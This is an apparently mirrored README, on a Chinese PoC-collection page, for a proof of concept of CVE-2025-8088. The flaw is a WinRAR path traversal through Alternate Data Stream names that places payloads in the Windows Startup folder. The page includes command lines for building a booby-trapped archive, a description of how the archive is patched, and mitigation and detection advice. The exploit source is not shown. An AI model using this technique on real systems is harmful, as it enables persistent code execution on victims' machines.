POC详情: 3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497

来源
https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
关联漏洞
标题: WinRAR 安全漏洞 (CVE-2025-8088)
描述:WinRAR是WinRAR公司的一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRAR存在安全漏洞,该漏洞源于路径遍历问题,可能导致任意代码执行。
介绍
# CVE-2025-8088 WinRAR Startup Folder Exploit Proof of Concept

![Windows](https://img.shields.io/badge/Platform-Windows-blue)
![Python](https://img.shields.io/badge/Python-3.7%2B-green)
![License](https://img.shields.io/badge/License-MIT-red)

A proof-of-concept exploit demonstrating **CVE-2025-8088**, a critical WinRAR vulnerability that allows arbitrary file write to the Windows Startup folder via path traversal in Alternate Data Stream (ADS) names.

---

## 📖 Overview

**CVE-2025-8088** is a security vulnerability in WinRAR that allows attackers to create specially crafted RAR archives that, when extracted, write files to arbitrary locations on the system.  
This PoC specifically targets the **Windows Startup folder** to achieve persistence and automatic execution of payloads.

---

## ⚠️ Disclaimer

> **This tool is for educational and research purposes only.**  
> Use only on systems you own or have explicit permission to test.  
> The authors are **not responsible** for any misuse of this tool.

---

## 🛡️ Affected Versions

- WinRAR versions **prior to 7.00 (build 10)**
- ✅ This vulnerability is patched in recent WinRAR updates

---

## 📋 Prerequisites

- Windows OS (**NTFS** file system required for ADS functionality)
- Python **3.7 or higher**
- WinRAR installed (`rar.exe` available in PATH or specified manually)

---

## 🚀 Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/your-username/CVE-2025-8088-WinRAR-Startup-Exploit.git
   cd CVE-2025-8088-WinRAR-Startup-Exploit
   ```

## 🎯 Usage

Basic usage with default parameters:

```bash
python cve-2025-8088-poc.py --decoy document.txt --payload script.bat
```

Advanced usage with custom parameters:

```bash
python cve-2025-8088-poc.py \
  --decoy "Important Document.pdf" \
  --payload "payload.bat" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out "malicious_archive.rar" \
  --workdir "C:\temp\exploit" \
  --placeholder_len 150
```

### Parameters

| Parameter           | Description                               | Default                         |
| ------------------- | ----------------------------------------- | ------------------------------- |
| `--decoy`           | Path to decoy file (created if missing)   | Required                        |
| `--payload`         | Path to payload file (created if missing) | Required                        |
| `--rar`             | Path to rar.exe                           | Auto-detected                   |
| `--out`             | Output RAR filename                       | `cve-2025-8088-startup-poc.rar` |
| `--workdir`         | Working directory                         | Current directory               |
| `--placeholder_len` | Length of ADS placeholder                 | Auto-calculated                 |

---

## 🔧 How It Works

1. **File Preparation** – Creates decoy and payload files if they don’t exist
2. **ADS Attachment** – Attaches the payload as an Alternate Data Stream to the decoy file
3. **Archive Creation** – Uses WinRAR to create a base archive containing the decoy with ADS
4. **Archive Manipulation** – Patches the archive to replace the ADS placeholder with a path traversal to the Startup folder
5. **Execution** – When extracted, WinRAR writes the payload to the **Startup folder** instead of the expected location

This exploit leverages **WinRAR’s handling of file streams** and **insufficient path validation** to achieve arbitrary file write.

---

## 🧪 Example Payload

A default payload is created if none exists:

```batch
@echo off
echo Hello World from Startup!
pause
```

> ⚠️ In real-world scenarios, this could be replaced with malicious code.
> For testing, we use a **harmless script**.

---

## 🛡️ Mitigation

1. Update WinRAR to the **latest version (7.00 build 10 or higher)**
2. Be cautious when extracting archives from **untrusted sources**
3. Regularly monitor the **Startup folder** for unexpected entries
4. Use security software capable of detecting **archive-based exploits**

---

## 📊 Detection

Security teams can look for:

* RAR archives containing **Alternate Data Streams**
* Archives with unusually long filenames containing **path traversal sequences**
* Files being written to the **Startup folder** from archive extraction processes

---

## 📚 References

* [CVE-2025-8088](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8088)
* [WinRAR Security Advisory](https://www.win-rar.com/singlenews.html?&L=0&tx_ttnews%5Btt_news%5D=174&cHash=abc123def456)
* [MITRE ATT\&CK: T1547.001 - Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547/001/)

---

## 🤝 Contributing

We welcome contributions to improve this PoC for educational purposes. Please ensure:

1. Your changes are **clearly documented**
2. You include **tests** where applicable
3. You follow **responsible disclosure practices**

---

## 📄 License

This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.
文件快照

 [4.0K]  /data/pocs/3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497
├── [9.1K]  main.py
└── [4.9K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。